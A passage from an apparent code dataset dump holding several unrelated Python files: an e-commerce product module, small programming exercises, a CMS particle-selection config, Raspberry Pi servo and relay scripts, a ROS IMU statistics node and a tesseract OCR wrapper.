---\n\n Return a list of recently visited products in JSON\n\n POST\n ----\n\n Add the product to the recent list manually. This method is required\n if the product page is cached, or is served by a Caching Middleware\n like Varnish which may clear the session before sending the request to\n Nereid.\n\n Just as with GET the response is the AJAX of recent products\n \"\"\"\n if request.method == 'POST':\n cls._add_to_recent_list(request.form.get('product_id', type=int))\n\n fields = set(request.args.getlist('fields')) or cls.json_allowed_fields\n fields = fields & cls.json_allowed_fields\n\n if 'sale_price' in fields:\n fields.remove('sale_price')\n\n response = []\n if hasattr(session, 'sid'):\n products = cls.browse(session.get('recent-products', []))\n for product in products:\n product_val = {}\n for field in fields:\n product_val[field] = getattr(product, field)\n product_val['sale_price'] = format_currency(\n product.sale_price(),\n current_locale.currency.code\n )\n response.append(product_val)\n\n return jsonify(products=response)\n\n @classmethod\n def _add_to_recent_list(cls, product_id):\n \"\"\"Adds the given product ID to the list of recently viewed products\n By default the list size is 5. To change this you can inherit\n product.product and set :attr:`recent_list_size` attribute to a\n non negative integer value\n\n For faster and easier access the products are stored with the ids alone\n this behaviour can be modified by subclassing.\n\n The deque object cannot be saved directly in the cache as its not\n serialisable. Hence a conversion to list is made on the fly\n\n .. versionchanged:: 0.3\n If there is no session for the user this function returns an empty\n list. This ensures that the code is consistent with iterators that\n may use the returned value\n\n :param product_id: the product id to prepend to the list\n \"\"\"\n if not hasattr(session, 'sid'):\n current_app.logger.warning(\n \"No session. Not saving to browsing history\"\n )\n return []\n\n recent_products = deque(\n session.setdefault('recent-products', []), cls.recent_list_size\n )\n # XXX: If a product is already in the recently viewed list, but it\n # would be nice to remember the recent_products list in the order of\n # visits.\n if product_id not in recent_products:\n recent_products.appendleft(product_id)\n session['recent-products'] = list(recent_products)\n return recent_products\n\n @classmethod\n @route('/products')\n @route('/products/')\n def render_list(cls, page=1):\n \"\"\"\n Renders the list of all products which are displayed_on_shop=True\n\n .. tip::\n\n The implementation uses offset for pagination and could be\n extremely resource intensive on databases. Hence you might want to\n either have an alternate cache/search server based pagination or\n limit the pagination to a maximum page number.\n\n The base implementation does NOT limit this and could hence result\n in poor performance\n\n :param page: The page in pagination to be displayed\n \"\"\"\n\n products = Pagination(cls, [\n ('displayed_on_eshop', '=', True),\n ('template.active', '=', True),\n ], page, cls.per_page)\n return render_template('product-list.jinja', products=products)\n\n def sale_price(self, quantity=0):\n \"\"\"Return the Sales Price.\n A wrapper designed to work as a context variable in templating\n\n The price is calculated from the pricelist associated with the current\n user. The user in the case of guest user is logged in user. In the\n event that the logged in user does not have a pricelist set against\n the user, the guest user's pricelist is chosen.\n\n Finally if neither the guest user, nor the regsitered user has a\n pricelist set against them then the list price is displayed as the\n price of the product\n\n :param quantity: Quantity\n \"\"\"\n return self.list_price\n\n @classmethod\n @route('/sitemaps/product-index.xml')\n def sitemap_index(cls):\n \"\"\"\n Returns a Sitemap Index Page\n \"\"\"\n index = SitemapIndex(cls, [\n ('displayed_on_eshop', '=', True),\n ('template.active', '=', True),\n ])\n return index.render()\n\n @classmethod\n @route('/sitemaps/product-.xml')\n def sitemap(cls, page):\n sitemap_section = SitemapSection(\n cls, [\n ('displayed_on_eshop', '=', True),\n ('template.active', '=', True),\n ], page\n )\n sitemap_section.changefreq = 'daily'\n return sitemap_section.render()\n\n def get_absolute_url(self, **kwargs):\n \"\"\"\n Return the URL of the current product.\n\n This method works only under a nereid request context\n \"\"\"\n return url_for('product.product.render', uri=self.uri, **kwargs)\n\n def _json(self):\n \"\"\"\n Return a JSON serializable dictionary of the product\n \"\"\"\n response = {\n 'template': {\n 'name': self.template.rec_name,\n 'id': self.template.id,\n 'list_price': self.list_price,\n },\n 'code': self.code,\n 'description': self.description,\n }\n return response\n\n def get_long_description(self):\n \"\"\"\n Get long description of product.\n\n If the product is set to use the template's long description, then\n the template long description is sent back.\n\n The returned value is a `~jinja2.Markup` object which makes it\n HTML safe and can be used directly in templates. It is recommended\n to use this method instead of trying to wrap this logic in the\n templates.\n \"\"\"\n if self.use_template_description:\n description = self.template.long_description\n else:\n description = self.long_description\n\n return Markup(description or '')\n\n def get_description(self):\n \"\"\"\n Get description of product.\n\n If the product is set to use the template's description, then\n the template description is sent back.\n\n The returned value is a `~jinja2.Markup` object which makes it\n HTML safe and can be used directly in templates. It is recommended\n to use this method instead of trying to wrap this logic in the\n templates.\n \"\"\"\n if self.use_template_description:\n description = self.template.description\n else:\n description = self.description\n return Markup(description or '')\n\n @classmethod\n def get_product_images(cls, products, name=None):\n \"\"\"\n Getter for `images` function field\n \"\"\"\n res = {}\n for product in products:\n product_images = []\n for media in product.media:\n if not media.static_file.mimetype:\n continue\n if 'image' in media.static_file.mimetype:\n product_images.append(media.static_file.id)\n res[product.id] = product_images\n return res\n\n def get_images(self):\n \"\"\"\n Get images of product variant.\n Fallback to template's images if there are no images\n for product.\n \"\"\"\n if self.images:\n return self.images\n return self.template.images\n\n\nclass ProductsRelated(ModelSQL):\n \"Related Product\"\n __name__ = 'product.product-product.product'\n _table = 'product_product_rel'\n\n product = fields.Many2One(\n 'product.product', 'Product',\n ondelete='CASCADE', select=True, required=True)\n up_sell = fields.Many2One(\n 'product.product', 'Up-sell Product',\n ondelete='CASCADE', select=True)\n cross_sell = fields.Many2One(\n 'product.product', 'Cross-sell Product',\n ondelete='CASCADE', select=True)\n\n\nclass ProductCategory:\n __metaclass__ = PoolMeta\n __name__ = 'product.category'\n\n @staticmethod\n def order_rec_name(tables):\n table, _ = tables[None]\n return [table.parent == Null, table.parent, table.name]\n\n @classmethod\n def __setup__(cls):\n super(ProductCategory, cls).__setup__()\n cls.rec_name.string = \"Parent/name\"\n","sub_path":"product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":17145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"497079319","text":"a, b = map(int, input().split())\na = min(a, 9999999)\nb = min(b, 9999999)\n\ndef is_prime(n):\n if n == 1:\n return False\n else:\n for i in range(2, int(n**0.5)+1):\n if n % i == 0:\n return False\n return True\n\ndef is_palin(n):\n x = str(n)\n if len(x) == 1:\n return True\n if len(x) % 2 == 1:\n for i in range(len(x)-1, len(x)//2, -1):\n if x[i] != x[(len(x)-1) - i]:\n return False\n return True\n else:\n for i in range(len(x)-1, len(x)//2 - 1, -1):\n if x[i] != x[(len(x)-1) - i]:\n return False\n return True\n \nfor x in range(a, b+1):\n if is_palin(x) == True and is_prime(x) == True:\n print(x)\nprint(-1)\n","sub_path":"susie/BOJ/20220424_1990_소수인팰린드롬.py","file_name":"20220424_1990_소수인팰린드롬.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"310241853","text":"# -*- coding: utf-8 -*-\n\n#문자열 곱하기 숫자 하면 문자열이 그 숫자만큼 반복된다\n\ndef line1():\n print('+-----' * 6 +'+')\n\ndef line2():\n print('| ' * 6 +'|')\n\ndef line(m):\n if m==1:\n line2()\n line2()\n line1()\n else:\n line2()\n line2()\n line1()\n line(m-1)\n\nm = eval(input())\n\nline1()\nprint('| | MON | TUE | WED | THU | FRI |')\nline1()\n\nline(m)\n","sub_path":"Python_basic/lecture data/practice/Lab_02_MakingWeeklyTable3.py","file_name":"Lab_02_MakingWeeklyTable3.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"616659221","text":"import FWCore.ParameterSet.Config as cms\n\n## jet selector\nfrom PhysicsTools.PatAlgos.selectionLayer1.jetSelector_cfi import *\n## muon selector\nfrom PhysicsTools.PatAlgos.selectionLayer1.muonSelector_cfi import *\n## electron selector\nfrom PhysicsTools.PatAlgos.selectionLayer1.electronSelector_cfi import *\n\n## jet count filter\nfrom PhysicsTools.PatAlgos.selectionLayer1.jetCountFilter_cfi import *\n## muon count filter\nfrom PhysicsTools.PatAlgos.selectionLayer1.muonCountFilter_cfi import *\n## electron count filter\nfrom PhysicsTools.PatAlgos.selectionLayer1.electronCountFilter_cfi import *\n\n\n#-------------------------------------------------\n# cleaning\n#-------------------------------------------------\n\nfrom PhysicsTools.PatAlgos.cleaningLayer1.cleanPatCandidates_cff import *\n\n## Electron cleaning against muons\n\ncleanPatElectrons.src = \"selectedPatElectrons\"\n\ncleanPatElectrons.checkOverlaps.muons.preselection = cms.string( 'isGlobalMuon'\n '| isTrackerMuon'\n #'& abs(eta) < 2.4'\n #'& pt > 20.'\n #'& track.numberOfValidHits > 10'\n #'& abs(dB) < 0.02'\n #'& combinedMuon.normalizedChi2 < 10.0'\n #'& (trackIso+caloIso)/pt < 0.15'\n )\ncleanPatElectrons.checkOverlaps.muons.deltaR = 0.1\ncleanPatElectrons.checkOverlaps.muons.requireNoOverlaps = True\n\n## Jet cleaning against electrons & muons\n\n#cleanPatJets.src = \"selectedPatJetsAK5PF\"\n#cleanPatJets.src = \"selectedPatJets\"\ncleanPatJets.src = cms.InputTag(\"residualCorrectedJets\")\n\ncleanPatJets.checkOverlaps.muons.preselection = cms.string( 'isTrackerMuon'\n '& isGlobalMuon'\n '& abs(eta) < 2.4'\n '& pt > 20.'\n '& track.numberOfValidHits > 10'\n '& globalTrack.hitPattern.numberOfValidMuonHits > 0'\n\n '& abs(dB) < 0.02'\n '& combinedMuon.normalizedChi2 < 10.0'\n '& (trackIso+caloIso)/pt < 0.15'\n )\ncleanPatJets.checkOverlaps.muons.deltaR = 0.4\ncleanPatJets.checkOverlaps.muons.requireNoOverlaps = True\n\ncleanPatJets.checkOverlaps.electrons.src = 'cleanPatElectrons'\ncleanPatJets.checkOverlaps.electrons.preselection = cms.string( 'abs(eta) < 2.5'\n '& et > 15.'\n '& superCluster.energy > 15.'\n '& abs(dB) < 0.04'\n #'& hcalOverEcal < 0.05'\n '& ( electronID(\\\"simpleEleId90cIso\\\") = 5. '\n '| electronID(\\\"simpleEleId90cIso\\\") = 7. )'\n '& ( ( (abs(superCluster.eta)>1.479) & (dr03TkSumPt()+dr03EcalRecHitSumEt()+dr03HcalTowerSumEt())/max(20.,et) < 0.15)'\n '| ( (abs(superCluster.eta)<1.479) & (dr03TkSumPt()+max(0.,dr03EcalRecHitSumEt()-1.)+dr03HcalTowerSumEt())/max(20.,et) < 0.15 ) )'\n )\ncleanPatJets.checkOverlaps.electrons.deltaR = 0.4\ncleanPatJets.checkOverlaps.electrons.requireNoOverlaps = True\n\n\n\n###########################################################################################\n#\n# MUON SELECTION\n#\n###########################################################################################\n\n## muons in tracker range\ntightMuons = selectedPatMuons.clone(src = 'cleanPatMuons',\n cut = 'abs(eta) < 2.4'\n\t\t\t\t )\n## tracker muons\ntrackerMuons = selectedPatMuons.clone(src = 'tightMuons',\n cut = 'isTrackerMuon'\n\t\t\t\t )\n## muons reconstructed globally\nglobalMuons = selectedPatMuons.clone(src = 'trackerMuons',\n cut = 'isGlobalMuon'\n\t\t\t\t )\n## pt cut\nhardMuons = selectedPatMuons.clone(src = 'globalMuons',\n cut = 'pt > 20.'\n\t\t\t\t )\n## n_hits\ngoodTrackMuons = selectedPatMuons.clone(src = 'hardMuons',\n cut = 'track.numberOfValidHits > 10'\n\t\t\t\t )\n## at least one valid muon hit\nmuHitMuons = selectedPatMuons.clone(src = 'goodTrackMuons',\n cut = 'globalTrack.hitPattern.numberOfValidMuonHits > 0'\n\t\t\t\t )\n## transverse impact parameter\ngoodD0Muons = selectedPatMuons.clone(src = 'muHitMuons',\n cut = 'abs(dB) < 0.02'\n\t\t\t\t )\n## global fit\ngoodMuons = selectedPatMuons.clone(src = 'goodD0Muons',\n cut = 'combinedMuon.normalizedChi2 < 10.0'\n\t\t\t\t )\n## isolation cut\nisolatedMuons = selectedPatMuons.clone(src = 'goodMuons',\n cut = '(trackIso+caloIso)/pt < 0.15'\n\t\t\t\t )\n## this collection is needed to make sure that one muon is in trigger range\nisolatedTightMuons = selectedPatMuons.clone(src = 'isolatedMuons',\n cut = 'abs(eta) < 2.1'\n\t\t\t\t )\n\n\n## Count Filters with n >= 1 requirement for control plots\noneTightMuonSelection = countPatMuons.clone(src = 'tightMuons', minNumber = 1)\noneTrackerMuonSelection = countPatMuons.clone(src = 'trackerMuons', minNumber = 1)\noneGlobalMuonSelection = countPatMuons.clone(src = 'globalMuons', minNumber = 1)\noneHardMuonSelection = countPatMuons.clone(src = 'hardMuons', minNumber = 1)\noneGoodTrackMuonSelection = countPatMuons.clone(src = 'goodTrackMuons', minNumber = 1)\noneMuHitMuonSelection = countPatMuons.clone(src = 'muHitMuons', minNumber = 1)\noneGoodD0MuonSelection = countPatMuons.clone(src = 'goodD0Muons', minNumber = 1)\noneGoodMuonSelection = countPatMuons.clone(src = 'goodMuons', minNumber = 1)\n\n## Count Filters with n >= 2 requirement for finale selection \ntwoTightMuonSelection = countPatMuons.clone(src = 'tightMuons', minNumber = 2)\ntwoTrackerMuonSelection = countPatMuons.clone(src = 'trackerMuons', minNumber = 2)\ntwoGlobalMuonSelection = countPatMuons.clone(src = 'globalMuons', minNumber = 2)\ntwoHardMuonSelection = countPatMuons.clone(src = 'hardMuons', minNumber = 2)\ntwoGoodTrackMuonSelection = countPatMuons.clone(src = 'goodTrackMuons', minNumber = 2)\ntwoMuHitMuonSelection = countPatMuons.clone(src = 'muHitMuons', minNumber = 2)\ntwoGoodD0MuonSelection = countPatMuons.clone(src = 'goodD0Muons', minNumber = 2)\ntwoGoodMuonSelection = countPatMuons.clone(src = 'goodMuons', minNumber = 2)\n\n## Count Requirements for isolated muons\ntwoIsolatedMuonSelection = countPatMuons.clone(src = 'isolatedMuons', minNumber = 2)\noneIsolatedTightMuonSelection = countPatMuons.clone(src = 'isolatedTightMuons', minNumber = 1)\n\n\n###########################################################################################\n#\n# ELECTRON SELECTION\n#\n###########################################################################################\n\n## Build Collections\n\n# this if I do cleaning afterwards\n# centralElectrons = selectedPatElectrons.clone( src = 'selectedPatElectrons',\n# cut = 'abs(eta) < 2.5'\n# )\n\n# this is I do cleaning before\ncentralElectrons = selectedPatElectrons.clone( src = 'cleanPatElectrons',\n cut = 'abs(eta) < 2.5'\n )\n\nhighPtElectrons = selectedPatElectrons.clone( src = 'centralElectrons',\n cut = 'et > 20.'\n )\n\ngoodSCElectrons = selectedPatElectrons.clone( src = 'highPtElectrons',\n cut = 'superCluster.energy > 15.'\n )\n\ngoodD0Electrons = selectedPatElectrons.clone( src = 'goodSCElectrons',\n cut = 'abs(dB) < 0.04'\n )\n\n#HoverEmElectrons = selectedPatElectrons.clone( src = 'goodD0Electrons',\n# cut = 'hcalOverEcal < 0.05'\n# )\n\n# Select conv.rej. & ID only -> 5 OR 7\nidOnlyElectrons = selectedPatElectrons.clone( src = 'goodD0Electrons',\n cut = 'electronID(\\\"simpleEleId90cIso\\\") = 5.'\n '| electronID(\\\"simpleEleId90cIso\\\") = 7.'\n )\n\nisolatedElectrons = selectedPatElectrons.clone( src = 'idOnlyElectrons',\n cut = '( (abs(superCluster.eta)>1.479) & (dr03TkSumPt()+dr03EcalRecHitSumEt()+dr03HcalTowerSumEt())/max(20.,et) < 0.15 )'\n '| ( (abs(superCluster.eta)<1.479) & (dr03TkSumPt()+max(0.,dr03EcalRecHitSumEt()-1.)+dr03HcalTowerSumEt())/max(20.,et) < 0.15 )'\n )\n\n## exact one very tight selected tag electron\n\ncentralElectronSelection = countPatElectrons.clone(src = 'centralElectrons', minNumber = 1)\nhighPtElectronSelection = countPatElectrons.clone(src = 'highPtElectrons', minNumber = 1)\ngoodSCElectronSelection = countPatElectrons.clone(src = 'goodSCElectrons', minNumber = 1)\ngoodD0ElectronSelection = countPatElectrons.clone(src = 'goodD0Electrons', minNumber = 1)\nHoverEmElectronSelection = countPatElectrons.clone(src = 'HoverEmElectrons', minNumber = 1)\nidOnlyElectronSelection = countPatElectrons.clone(src = 'idOnlyElectrons', minNumber = 1)\nisolatedElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 1)\nonlyOneElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 1, maxNumber = 1)\n\n\n## Count Filters with n >= 2 requirement for finale selection \ntwoCentralElectronSelection = countPatElectrons.clone(src = 'centralElectrons', minNumber = 2)\ntwoHighPtElectronSelection = countPatElectrons.clone(src = 'highPtElectrons', minNumber = 2)\ntwoGoodSCElectronSelection = countPatElectrons.clone(src = 'goodSCElectrons', minNumber = 2)\ntwoGoodD0ElectronSelection = countPatElectrons.clone(src = 'goodD0Electrons', minNumber = 2)\ntwoHoverEmElectronSelection = countPatElectrons.clone(src = 'HoverEmElectrons', minNumber = 2)\ntwoIdOnlyElectronSelection = countPatElectrons.clone(src = 'idOnlyElectrons', minNumber = 2)\ntwoIsolatedElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 2)\nexactlyTwoElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 2, maxNumber = 2)\n\n\n## Count Requirements for isolated electrons\n# twoIsolatedElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 2)\n# isolatedElectronSelection = countPatElectrons.clone(src = 'isolatedElectrons', minNumber = 1)\n\n\n\n\n###########################################################################################\n#\n# JET SELECTION\n#\n###########################################################################################\n\n## Build Collections\n# this is needed for the new definition of PF id\nfrom TopAnalysis.TopFilter.filters.JetIdFunctorFilter_cfi import *\n## jet PF ID selection \n# cleanPatJets.src = cms.InputTag(\"selectedPatJetsAK5PF\")\n# cleanPatJets.src = cms.InputTag(\"residualCorrectedJets\") # for data\ngoodIdJets.jets = cms.InputTag(\"cleanPatJets\")\ngoodIdJets.jetType = cms.string('PF')\ngoodIdJets.version = cms.string('FIRSTDATA')\ngoodIdJets.quality = cms.string('LOOSE')\n\n## good jet selection\ngoodJets = selectedPatJets.clone( src = 'goodIdJets',\n cut = 'pt > 15.'\n )\n\n## tight jet selection\ntightJets = selectedPatJets.clone(src = 'goodJets',\n cut = 'abs(eta) < 2.5'\n )\n\n## hard jet selection\nhardJets = selectedPatJets.clone( src = 'tightJets',\n cut = 'pt > 30.'\n )\n\n\ngoodIdJetsPF = selectedPatJets.clone( src = 'hardJets')\n\n\n\n## check for different btag properties\ntrackCountingHighEffBJets = selectedPatJets.clone( src = 'goodIdJetsPF',\n cut = 'bDiscriminator(\\\"trackCountingHighEffBJetTags\\\") > 1.7'\n )\n\nsimpleSecondaryVertexBJets = selectedPatJets.clone( src = 'goodIdJetsPF',\n cut = 'bDiscriminator(\\\"simpleSecondaryVertexHighEffBJetTags\\\") > 1.74'\n )\n\n## Count Filters\nhardJetSelection = countPatJets.clone(src = 'hardJets', minNumber = 1, maxNumber = 999)\ntightJetSelection = countPatJets.clone(src = 'tightJets', minNumber = 1, maxNumber = 999)\noneGoodIdJetPFSelection = countPatJets.clone(src = 'goodIdJetsPF', minNumber = 1, maxNumber = 999)\ntwoGoodIdJetPFSelection = countPatJets.clone(src = 'goodIdJetsPF', minNumber = 2, maxNumber = 999)\nbJetTCHSelection = countPatJets.clone(src = 'trackCountingHighEffBJets', minNumber = 1, maxNumber = 999)\nbJetSSVSelection = countPatJets.clone(src = 'simpleSecondaryVertexBJets', minNumber = 1, maxNumber = 999)\n\n\n\n###########################################################################################\n#\n# MET SELECTION\n#\n###########################################################################################\n\n## met selector\nhighMETs = cms.EDFilter( \"PATMETSelector\",\n src = cms.InputTag(\"patMETsPF\"),\n cut = cms.string(\"et > 30.\")\n )\n\n## Count Filter\nmetSelection = cms.EDFilter(\"PATCandViewCountFilter\",\n minNumber = cms.uint32(1),\n maxNumber = cms.uint32(999999),\n src = cms.InputTag(\"highMETs\")\n )\n\n\n\n\n###########################################################################################\n#\n# SEQUENCES\n#\n###########################################################################################\napplyCleaning = cms.Sequence( cleanPatCandidates )\n\n\nbuildJets = cms.Sequence(goodIdJets *\n goodJets *\n\t\t\t tightJets *\n\t\t\t hardJets *\n goodIdJetsPF\n\t\t\t)\n\n\nrequireOneIsolatedElectronSelection = cms.Sequence( centralElectrons *\n centralElectronSelection *\n highPtElectrons *\n highPtElectronSelection *\n goodSCElectrons *\n goodSCElectronSelection *\n goodD0Electrons *\n goodD0ElectronSelection *\n #HoverEmElectrons *\n #HoverEmElectronSelection *\n idOnlyElectrons *\n idOnlyElectronSelection *\n isolatedElectrons *\n isolatedElectronSelection\n #onlyOneMuonSelection *\n #onlyOneElectronSelection\n )\n\n\n\nrequireTwoIsolatedElectrons = cms.Sequence(twoCentralElectronSelection *\n\t\t\t\t twoHighPtElectronSelection *\n\t\t\t\t twoGoodSCElectronSelection *\n \t\t\t twoGoodD0ElectronSelection *\n \t\t\t twoIdOnlyElectronSelection *\n \t\t\t twoIsolatedElectronSelection \n\t\t\t\t )\n\n\nonePFJetSelection = cms.Sequence( goodIdJets *\n goodJets *\n tightJets *\n tightJetSelection *\n hardJets *\n hardJetSelection *\n goodIdJetsPF *\n oneGoodIdJetPFSelection\n )\n\ntwoPFJetSelection = cms.Sequence( twoGoodIdJetPFSelection )\n\npfMETSelection = cms.Sequence( highMETs *\n metSelection\n )\n\nbTagSelection = cms.Sequence( trackCountingHighEffBJets *\n bJetTCHSelection\n # simpleSecondaryVertexBJets *\n # bJetSSVSelection\n )\n\n################################################################################\n#\n# HELPER FUNCTION\n#\n################################################################################\n\t\t# cleanPatJets.src = cms.InputTag(\"residualCorrectedJets\")\n","sub_path":"TopFilter/python/sequences/fullLeptonicElectronElectronSelectionDATA_cff.py","file_name":"fullLeptonicElectronElectronSelectionDATA_cff.py","file_ext":"py","file_size_in_byte":18084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"318401011","text":"import pi_servo_hat\nimport smbus, time\nimport datetime\nimport logging\n\nclass MotorDoor:\n \"\"\"A class than handles interactions with a servo motor driving the dog door\"\"\"\n def __init__(self,bus=1, motor_slot=0,addr=0x40, open_position=240,closed_position=420,jump_dist=5):\n self.logger = logging.getLogger(__name__)\n self.open_position = open_position\n self.closed_position = closed_position\n self.jump_dist = jump_dist\n\n self.bus = smbus.SMBus(bus)\n self.addr = addr\n\n self.rotation_position = self.closed_position\n self.opened_time = datetime.datetime.now().timestamp() - 10000 # something a longish time ago... we really don't know\n self.is_open = True\n\n ## Setup the motor\n time.sleep(1)\n self.bus.write_byte_data(addr, motor_slot, 0x20) # enables word writes\n time.sleep(.25)\n self.bus.write_byte_data(addr, motor_slot, 0x10) # enable Prescale change as noted in the datasheet\n time.sleep(.25) # delay for reset\n self.bus.write_byte_data(addr, 0xfe, 0x79) #changes the Prescale register value for 50 Hz, using the equation in the datasheet.\n self.bus.write_byte_data(addr, motor_slot, 0x20) # enables word writes\n time.sleep(.25)\n\n self.slow_close(0)\n \n def slow_open(self):\n if not self.is_open:\n self.logger.info(\"Opening door\")\n for i in range(self.closed_position,self.open_position,-1 * self.jump_dist):\n self.move_to(i)\n time.sleep(0.1)\n self.rotation_position = self.open_position\n self.opened_time = datetime.datetime.now().timestamp()\n else:\n self.move_to(self.open_position) # keep forcing open\n self.is_open = True\n \n def slow_close(self,min_time):\n if self.is_open:\n tm = datetime.datetime.now().timestamp()\n if tm - self.opened_time > min_time:\n self.logger.info(\"Closing door\")\n for i in range(self.open_position,self.closed_position,self.jump_dist):\n self.move_to(i)\n time.sleep(0.1)\n self.move_to(self.closed_position)\n self.rotation_position = self.closed_position\n self.is_open = False\n else:\n self.logger.debug(\"Door not closed due to timeout\")\n else:\n self.move_to(self.closed_position) # keep forcing open\n \n def move_to(self,move_to_position):\n #write start and stop to channel\n self.bus.write_word_data(self.addr, 0x06, 0) \n self.bus.write_word_data(self.addr, 0x08, move_to_position)\n\nif __name__ == \"__main__\":\n \n door = MotorDoor()\n door.slow_open()\n","sub_path":"src/test/motor_door.py","file_name":"motor_door.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"525073105","text":"# Toggles two relays and built-in LED\nimport utime\n\nfrom machine import Pin\ndef main():\n relay1 = Pin(12, Pin.OUT)\n relay2 = Pin(13, Pin.OUT)\n led1 = Pin(16, Pin.OUT)\n enabled = False\n while True:\n if enabled:\n relay1.off()\n relay2.on()\n led1.on()\n print('off')\n else:\n relay1.on()\n relay2.off()\n led1.off()\n print('on')\n utime.sleep_ms(1000)\n enabled = not enabled\n\nif __name__ == '__main__':\n main()\n","sub_path":"blink/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"236636988","text":"#!/usr/bin/python2.7\n\nimport rospy\nimport tf\nfrom sensor_msgs.msg import Imu\nimport os\nimport numpy as np\nPATH = os.path.dirname(os.path.abspath(__file__))\nprint(PATH)\n\nclass CSVManager:\n def __init__(self, file_path):\n self.f = open(file_path,'w+')\n\n def writer(self, data_list=[]):\n if len(data_list) == 0:\n return True\n data = data_list\n if type(data_list[0]) in [int, float]:\n data = []\n for d in data_list:\n data.append(str(d))\n data = \", \".join(data)\n self.f.write(data+\"\\n\")\n\n def reader(self):\n # not now\n pass \n\nclass SensorFusion:\n def __init__(self,axis=0):\n rospy.init_node(\"SensorFusion\",anonymous=True)\n rospy.Subscriber(\"/imu/data\",Imu, self.imu_callback)\n # rospy.Subscriber(\"/gx4_45_imu/data\",Imu, self.imu_callback)\n \n self.orientation = None\n self.euler = [0,0,0]\n self.old_acc = [0,0,0]\n self.acc = [[0],[0],[0]]\n # self.csv = CSVManager(PATH + \"/csv/compare_old_new.csv\")\n self.count = 0\n self.axis = axis\n self.sampling = 50\n\n def imu_callback(self,msg):\n self.acc[0].append(msg.linear_acceleration.x) \n self.acc[1].append(msg.linear_acceleration.y) \n self.acc[2].append(msg.linear_acceleration.z) \n # self.quaternion = (\n # msg.orientation.x,\n # msg.orientation.y,\n # msg.orientation.z,\n # msg.orientation.w\n # )\n # self.euler = tf.transformations.euler_from_quaternion(self.quaternion)\n # print(self.euler)\n self.run()\n\n def run(self):\n if len(self.acc[self.axis]) > 0 and len(self.acc[self.axis]) % self.sampling == 0:\n # # print(\"Count: \" + str(count*self.sampling)+\" Mean | Max | Min | Variance | Total Variance |\")\n # mean = np.mean(self.acc[self.axis][self.count*self.sampling:self.count*self.sampling + self.sampling])\n # max = np.max(self.acc[self.axis][self.count*self.sampling:self.count*self.sampling + self.sampling])\n # min = np.min(self.acc[self.axis][self.count*self.sampling:self.count*self.sampling + self.sampling])\n # var = np.var(self.acc[self.axis][self.count*self.sampling:self.count*self.sampling + self.sampling])\n mean = np.mean(self.acc[self.axis][1:self.count*self.sampling + self.sampling])\n max = np.max(self.acc[self.axis][1:self.count*self.sampling + self.sampling])\n min = np.min(self.acc[self.axis][1:self.count*self.sampling + self.sampling])\n var = np.var(self.acc[self.axis][1:self.count*self.sampling + self.sampling])\n # var = np.var(self.acc[self.axis][1:])\n range = abs(max - min)\n self.count += 1\n if self.count % 20 == 0 and self.count > 0:\n print(\"=============================== Axis: %s ========================================\"%self.axis)\n print(\"%8s %10s %10s %10s %10s %14s %14s\" %(\"Count |\", \"Mean |\", \"Max |\" ,\"Min |\",\"Range |\" ,\"Variance |\", \"Total Variance |\"))\n print(\"%6d | %+7.6f | %+7.6f | %+7.6f | %+7.6f | %+9.10f | %+9.10f |\"%(self.count*self.sampling,mean,max,min,range,var,var))\n\nif __name__ == '__main__':\n axis = raw_input(\"Axis: \")\n ax = {'x':0,'y':1,'z':2}\n sf = SensorFusion(ax[axis.lower()])\n print(\"=============================== Axis: %s ========================================\"%axis)\n print(\"%8s %10s %10s %10s %10s %14s %14s\" %(\"Count |\", \"Mean |\", \"Max |\" ,\"Min |\",\"Range |\" ,\"Variance |\", \"Total Variance |\"))\n rospy.spin()","sub_path":"zeabus_sensor/scripts/imu_filter.py","file_name":"imu_filter.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"471764430","text":"# coding: utf-8\n\n'''\n@ tesseract\nbrew install tesseract\n\n@ guide\nhttps://pypi.python.org/pypi/pytesseract\nhttp://www.cnblogs.com/wzben/p/5930538.html\nhttp://www.cnblogs.com/wzben/p/5930538.html\nhttp://www.pyimagesearch.com/2017/07/10/using-tesseract-ocr-python/\n'''\nimport os\nimport subprocess\nimport logging\n\nlogger = logging.getLogger('ocr')\nformatter = logging.Formatter('%(asctime)s, %(levelname)s %(message)s')\nsh = logging.StreamHandler()\nsh.setFormatter(formatter)\nlogger.addHandler(sh)\n\ndef image_to_string(img, cleanup=True, plus=''):\n # cleanup为True则识别完成后删除生成的文本文件\n # plus参数为给tesseract的附加高级参数\n if not os.path.exists(img):\n logger.error(\"%s doesn't exist\", img)\n return ''\n subprocess.check_output('tesseract ' + img + ' ' +\n img + ' ' + plus, shell=True) # 生成同名txt文件\n text = ''\n with open(img + '.txt', 'r') as f:\n text = f.read().strip()\n if cleanup:\n os.remove(img + '.txt')\n return text\n\n\nif __name__ == '__main__':\n # try:\n # import Image\n # except ImportError:\n # from PIL import Image\n # import pytesseract\n #\n # pytesseract.pytesseract.tesseract_cmd = '/usr/local/Cellar/tesseract/3.05.01/'\n # # Include the above line, if you don't have tesseract executable in your PATH\n # # Example tesseract_cmd: 'C:\\\\Program Files (x86)\\\\Tesseract-OCR\\\\tesseract'\n #\n # print(pytesseract.image_to_string(Image.open('test.png')))\n # print(pytesseract.image_to_string(Image.open('test.png'), lang='fra'))\n\n # print(image_to_string('./test.png', True, '-l chi_sim'))\n 